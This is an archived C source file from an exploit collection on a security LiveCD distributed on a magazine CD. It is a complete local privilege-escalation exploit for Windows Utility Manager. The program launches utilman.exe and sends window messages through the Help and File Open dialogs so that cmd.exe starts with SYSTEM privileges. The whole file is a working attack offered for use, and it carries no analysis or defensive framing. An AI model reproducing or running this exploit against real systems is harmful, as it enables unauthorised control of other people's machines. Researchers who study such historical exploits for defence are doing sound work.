home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / UtilManExploit.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  77 lines
  1. // By Cesar Cerrudo (cesar@appsecinc.com)
  2. // Local elevation of priviliges exploit for Windows Utility Manager
  3. // Gives you a shell with system privileges
  4. // If you have problems try changing Sleep() values.
  5.  
  6. #include <stdio.h> 
  7. #include <windows.h> 
  8. #include <commctrl.h>
  9. #include <Winuser.h>
  10.  
  11. int main(int argc, char *argv[]) 
  13.   HWND lHandle, lHandle2;
  14.   POINT point;
  15.  
  16.   char sText[]="%windir%\\system32\\cmd.ex?";
  17.  
  18.   // run utility manager
  19.   system("utilman.exe /start");
  20.   Sleep(500);
  21.  
  22.   // execute contextual help
  23.   SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
  24.   Sleep(500);
  25.  
  26.   // open file open dialog windown in Windows Help
  27.   PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
  28.   Sleep(500);
  29.  
  30.   // find open file dialog window
  31.   lHandle = FindWindow("#32770","Open");
  32.  
  33.   // get input box handle
  34.   lHandle2 = GetDlgItem(lHandle, 0x47C);
  35.   Sleep(500);
  36.  
  37.   // set text to filter listview to display only cmd.exe
  38.   SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
  39.   Sleep(800);
  40.  
  41.   // send return
  42.   SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
  43.  
  44.   //get navigation bar handle
  45.   lHandle2 = GetDlgItem(lHandle, 0x4A0);
  46.   //send tab
  47.   SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
  48.   Sleep(500);
  49.   lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
  50.   //get list view handle
  51.   lHandle2 = GetDlgItem(lHandle2, 0x1);
  52.  
  53.   SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
  54.   SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
  55.   SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
  56.   Sleep(500);
  57.   
  58.   // popup context menu
  59.   PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
  60.   Sleep(1000);
  61.  
  62.   // get context menu handle
  63.   point.x =10; point.y =30;
  64.   lHandle2=WindowFromPoint(point);
  65.  
  66.   SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  67.   SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  68.   SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
  69.  
  70.   SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
  71.  
  72.   return(0);
  73. }
  74.  
  75.  
  76.  
  77.